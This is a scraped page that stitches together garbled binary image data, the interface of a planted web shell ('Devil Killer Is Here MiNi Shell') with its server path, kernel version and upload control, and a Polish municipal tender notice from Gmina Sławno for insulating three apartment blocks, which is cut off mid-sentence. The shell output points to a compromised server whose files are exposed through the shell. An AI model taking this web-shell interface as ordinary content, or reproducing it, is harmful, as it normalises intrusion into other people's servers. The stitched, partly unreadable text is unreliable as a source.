JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210211/0000688401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00006884 z dnia 2021-02-11</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja trzech bloków mieszkalnych na osiedlu Grudzeń Las </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SŁAWNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648178</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marszałka Józefa Piłsudskiego 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sławno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-332</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">44 755 18 53</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ugslawno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugslawno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja trzech bloków mieszkalnych na osiedlu Grudzeń Las </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-19fadfce-6c5a-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00006884</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-02-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004112/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Termomodernizacja trzech bloków mieszkalnych na osiedlu Grudzeń Las </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.bip.ugslawno.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym aWykonawcami odbywa się drogą elektroniczną przy użyciu miniPortaluhttps://miniportal.uzp.gov.pl/ Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencjielektronicznej przekazywanej przy ich użyciu, opisane zostały w regulaminie korzystania z miniPortalu.Wykonawca przystępując do niniejszego postępowania o udzielenie zamówieniapublicznego, akceptuje warunki korzystania z miniPortalu określone w regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanychformularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.Za datę przekazania oferty, oświadczenia, o którym mowa w art.125ust.1 pzp,podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niżoferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal(Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie możebyć szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP). Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: sekretariat@ugslawno.plDokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email: sekretariat@ugslawno.pl Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzieleniezamówienia publicznego lub konkursie. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">• Administratorem Pani/Pana danych osobowych jest Wójt Gminy Sławno z siedzibą w Sławnie, ul. Marszałka Józefa Piłsudskiego 31, 26-332 Sławno, tel. 44/ 755 18 50; • W sprawach związanych z danymi osobowymi należy kontaktować się z Inspektorem ochrony danych poprzez adres e-mail: iod@ugslawno.pl•	Dane Wykonawcy będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego wynikających przepisów prawa:- ustawa z dnia 29 stycznia 2004 roku Prawo zamówień publicznych - rozporządzenia Ministra Rozwoju z dnia 29 czerwca 2020 r. w sprawie rodzajów dokumentów, jakie może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia - ustawa o narodowym zasobie archiwalnym i archiwach ( Dz. U. 2020 r. poz. 164 ze zm.)•	Dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne. Ograniczenie dostępu do danych może wystąpić jedynie w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności. •	Dane Wykonawcy będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia.•	Obowiązek podania przez Wykonawcę danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych• Wykonawca ma prawo do: - prawo dostępu do danych osobowych; - prawo do sprostowania ( poprawiania) swoich danych osobowych *; - prawo do usunięcia danych osobowych , w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej - ograniczenia przetwarzania danych osobowych przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa **; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OśiP 271.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem niniejszego zamówienia jest Termomodernizacja trzech Bloków Mieszkalnych na osiedlu Grudzeń Las.2.	Opis.1) Termomodernizacja Bloku Mieszkalnego na osiedlu Grudzeń Las Blok nr 1Zestawienie powierzchni dla Bloku nr 1:	- Powierzchnia netto budynku – 775m2- Kubatura części ogrzewanej – 1937m3- Ilość kondygnacji - 3+piwnica- Liczba lokali – 15- Liczba osób użytkujących budynek – 581. Docieplenie ścian piwnic wykonane z styropianu XPS styropian ekstradowanego grubości 8cm o współczynniku przewodzenia ciepła materiału dociepleniowego lambda (0,032W/mK), oraz współczynniku przewodzenia ciepła (U) przegrody po dociepleniu 0,324W/(m2K). Ilość docieplenia ścian piwnic - 189m22. Ocieplenie ścian zewnętrznych (podłużnych) budynku styropianem gr. 12cm o współczynniku przewodzenia ciepła materiału dociepleniowego lambda (0,032W/mK)oraz współczynniku przewodzenia ciepła (U) przegrody po dociepleniu 0,187W/(m2K). Docieplenie wykonane metodą lekką mokrą .Ilość docieplenia ścian zewnętrznych 440m2.Ilość docieplenia ościeży okien 67,54 m2 grubość docieplenia 2cm.3. Wymiana stolarki okiennej w piwnicach na okna o współczynniku przenikania ciepła U=1,3W/(m2K). Okna sześciokomorowe szyba ciepła z ramką i nawiewnikami powietrza regulowanymi automatycznie.Powierzchnia okien do wymiany 6,3m2 w ilości 13szt.4. Ocieplenie stropodachu wykonane z granulatu do docieplanania stropodachów (wełna mineralna lub styropian) grubość docieplenia 20cm o współczynniku przewodzenia ciepła materiału dociepleniowego lambda (0,040W/mK), oraz współczynniku przewodzenia ciepła (U) przegrody po dociepleniu 0,147W/(m2K). Wykonanie izolacji cieplnej stropodachu wełną mineralną gr 20cm .Przed przystąpieniem do wykonania docieplenia należy oczyścić podłoże oraz wykonać ułożenie foli paroizolacyjnej (zabezpieczenie przedostawania się wilgoci do pomieszczeń niżej wykonywanej warstwy).Ilość powierzchni docieplenia stropodachu 270m2.5. Wymiana grzejników w lokalach mieszkalnych i zastosowanie termostatycznych zaworów powietrza regulowanymi automatycznieWymiana grzejników łazienkowych w ilości 15szt.Wymiana grzejników w lokalach mieszkalnych 382szt /żeberek. Głowice termostatyczne grzejnikowe automatyczne ilość do wymiany /montażu – 67szt.6 . Rozebranie nawierzchni z kostki brukowej wraz z powtórnym montażem w ilości 48m2.7. Naprawa orynnowania bloku oraz inne roboty dekarskie Rynny dachowe naprawa 27m2.Rury spustowe naprawa 18mb.Wykonanie zabezpieczenia wylotów dymowych i wentylacyjnych kominów przeciw gniazdom ptaków – 5szt/komin.Naprawa instalacji odgromowej budynku wraz z wykonaniem pomiarów 1kpl.8. Naprawa balkonów bloku wraz z wykonaniem obróbki blacharskiej i izolacji przeciwwilgociowej z papy termozgrzewalnej.2) Termomodernizacja Bloku Mieszkalnego na osiedlu Grudzeń Las Blok nr 2Zestawienie powierzchni dla Bloku nr 2:- Powierzchnia netto budynku – 775m2- Kubatura części ogrzewanej – 1937m3- Ilość kondygnacji - 3+piwnica- Liczba lokali – 15- Liczba osób użytkujących budynek – 581. Docieplenie ścian piwnic wykonane z styropianu XPS styropian ekstradowanego grubości 8cm o współczynniku przewodzenia ciepła materiału dociepleniowego lambda (0,032W/mK), oraz współczynniku przewodzenia ciepła (U) przegrody po dociepleniu 0,324W/(m2K). Ilość docieplenia ścian piwnic - 189m22. Ocieplenie ścian zewnętrznych (podłużnych) budynku styropianem gr. 12cm o współczynniku przewodzenia ciepła materiału dociepleniowego lambda (0,032W/mK)oraz współczynniku przewodzenia ciepła (U) przegrody po dociepleniu 0,187W/(m2K). Docieplenie wykonane metodą lekką mokrą .Ilość docieplenia ścian zewnętrznych 440m2.Ilość docieplenia ościeży okien 67,54 m2 grubość docieplenia 2cm.3. Wymiana stolarki okiennej w piwnicach na okna o współczynniku przenikania ciepła U=1,3W/(m2K). Okna sześciokomorowe szyba ciepła z ramką i nawiewnikami powietrza regulowanymi automatycznie.Powierzchnia okien do wymiany 7,56m2 w ilości 14szt.4. Wymiana stolarki okiennej w lokalach mieszkalnych na okna o współczynniku przenikania ciepła U=0,900W/(m2K). Okna sześciokomorowe szyba ciepła z ramką i nawiewnikami powietrza regulowanymi automatycznie.Powierzchnia okien do wymiany 13,20m2 w ilości 6szt.5. Ocieplenie stropodachu wykonane z granulatu do docieplanania stropodachów (wełna mineralna lub styropian) grubość docieplenia 20cm o współczynniku przewodzenia ciepła materiału dociepleniowego lambda (0,040W/mK), oraz współczynniku przewodzenia ciepła (U) przegrody po dociepleniu 0,147W/(m2K). Wykonanie izolacji cieplnej stropodachu wełną mineralną gr 20cm .Przed przystąpieniem do wykonania docieplenia należy oczyścić podłoże oraz wykonać ułożenie foli paroizolacyjnej (zabezpieczenie przedostawania się wilgoci do pomieszczeń niżej wykonywanej warstwy).Ilość powierzchni docieplenia stropodachu 270m2.6. Wymiana grzejników w lokalach mieszkalnych i zastosowanie termostatycznych zaworów powietrza regulowanymi automatycznieWymiana grzejników łazienkowych w ilości 13szt.Wymiana grzejników w lokalach mieszkalnych 300szt /żeberek. Głowice termostatyczne grzejnikowe automatyczne ilość do wymiany /montażu – 65szt.7 . Rozebranie nawierzchni z kostki brukowej wraz z powtórnym montażem w ilości 48m2.8. Naprawa orynnowania bloku oraz inne roboty dekarskie Rynny dachowe naprawa 27m2.Rury spustowe naprawa 18mb.Wykonanie zabezpieczenia wylotów dymowych i wentylacyjnych kominów przeciw gniazdom ptaków – 5szt/komin.Naprawa instalacji odgromowej budynku wraz z wykonaniem pomiarów 1kpl.9. Naprawa balkonów bloku wraz z wykonaniem obróbki blacharskiej i izolacji przeciwwilgociowej z papy termozgrzewalnej.3) Termomodernizacja Bloku Mieszkalnego na osiedlu Grudzeń Las Blok nr 3Zestawienie powierzchni dla Bloku nr 3:- Powierzchnia netto budynku – 775m2- Kubatura części ogrzewanej – 1937m3- Ilość kondygnacji - 3+piwnica- Liczba lokali – 15- Liczba osób użytkujących budynek – 581. Docieplenie ścian piwnic wykonane z styropianu XPS styropian ekstradowanego grubości 8cm o współczynniku przewodzenia ciepła materiału dociepleniowego lambda (0,032W/mK), oraz współczynniku przewodzenia ciepła (U) przegrody po dociepleniu 0,324W/(m2K). Ilość docieplenia ścian piwnic - 189m22. Ocieplenie ścian zewnętrznych (podłużnych) budynku styropianem gr. 12cm o współczynniku przewodzenia ciepła materiału dociepleniowego lambda (0,032W/mK)oraz współczynniku przewodzenia ciepła (U) przegrody po dociepleniu 0,187W/(m2K). Docieplenie wykonane metodą lekką mokrą .Ilość docieplenia ścian zewnętrznych 440m2.Ilość docieplenia ościeży okien 67,54 m2 grubość docieplenia 2cm.3. Wymiana stolarki okiennej w piwnicach na okna o współczynniku przenikania ciepła U=1,3W/(m2K). Okna sześciokomorowe szyba ciepła z ramką i nawiewnikami powietrza regulowanymi automatycznie.Powierzchnia okien do wymiany 7,56m2 w ilości 15szt.4. Wymiana stolarki okiennej w lokalach mieszkalnych na okna o współczynniku przenikania ciepła U=0,900W/(m2K). Okna sześciokomorowe szyba ciepła z ramką i nawiewnikami powietrza regulowanymi automatycznie.Powierzchnia okien do wymiany 15,60m2 w ilości 8szt.5. Ocieplenie stropodachu wykonane z granulatu do docieplanania stropodachów (wełna mineralna lub styropian) grubość docieplenia 20cm o współczynniku przewodzenia ciepła materiału dociepleniowego lambda (0,040W/mK), oraz współczynniku przewodzenia ciepła (U) przegrody po dociepleniu 0,147W/(m2K). Wykonanie izolacji cieplnej stropodachu wełną mineralną gr 20cm .Przed przystąpieniem do wykonania docieplenia należy oczyścić podłoże oraz wykonać ułożenie foli paroizolacyjnej (zabezpieczenie przedostawania się wilgoci do pomieszczeń niżej wykonywanej warstwy).Ilość powierzchni docieplenia stropodachu 270m2.6. Wymiana grzejników w lokalach mieszkalnych i zastosowanie termostatycznych zaworów powietrza regulowanymi automatycznieWymiana grzejników łazienkowych w ilości 15szt.Wymiana grzejników w lokalach mieszkalnych 286szt /żeberek. Głowice termostatyczne grzejnikowe automatyczne ilość do wymiany /montażu – 67szt.7 . Rozebranie nawierzchni z kostki brukowej wraz z powtórnym montażem w ilości 48m2.8. Naprawa orynnowania bloku oraz inne roboty dekarskie Rynny dachowe naprawa 27m2.Rury spustowe naprawa 18mb.Wykonanie zabezpieczenia wylotów dymowych i wentylacyjnych kominów przeciw gniazdom ptaków – 5szt/komin.Naprawa instalacji odgromowej budynku wraz z wykonaniem pomiarów 1kpl.9. Naprawa balkonów bloku wraz z wykonaniem obróbki blacharskiej i izolacji przeciwwilgociowej z papy termozgrzewalnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262900-0 - Roboty balkonowe</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-07-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3) sytuacji ekonomicznej lub finansowej: Wykonawca spełni warunek, jeżeli wykaże, że posiada opłaconą polisę, a w przypadku jejbraku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnejw zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia,o wartości ubezpieczenia na kwotę nie mniejszą niż 500 000,00 zł (słownie: pięćset tysięcyzłotych 00/100 gr).3) zdolności technicznej lub zawodowej:Wykonawca spełni warunek, jeżeli wykaże, że:a) dysponuje następującymi osobami skierowanymi przez Wykonawcę do realizacjizamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotamibudowlanymi:- kierownik budowy, posiadający uprawnienia do pełnienia samodzielnych funkcjitechnicznych w budownictwie o specjalności konstrukcyjno- budowlanej. W przypadku warunku zdolności technicznej lub zawodowej, w zakresie dysponowania osobamiskierowanymi przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych zakierowanie robotami budowlanymi, Zamawiający uznaje wymagane uprawnienia do kierowaniarobotami budowlanymi określone w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29kwietnia 2019r. (Dz.U. z 2019 r. poz. 831) w sprawie przygotowania zawodowego do wykonania samodzielnych funkcji technicznych wbudownictwie oraz uprawnienia obowiązujące wydane na podstawie wcześniej obowiązującychprzepisów prawnych, a także zgodnie z art. 12a ustawy z dnia 7 lipca 1994r. – Prawo budowlane(Dz.U. z 2020 r. poz. 1333, z późn. zm.), Zamawiający uznaje również wymagane uprawnieniabudowlane do kierowania robotami budowlanymi nabyte w innych niż Rzeczpospolita Polskapaństwach członkowskich Unii Europejskiej, państwach członkowskich EuropejskiegoPorozumienia o Wolnym Handlu (EFTA) – stronach umowy o Europejskim 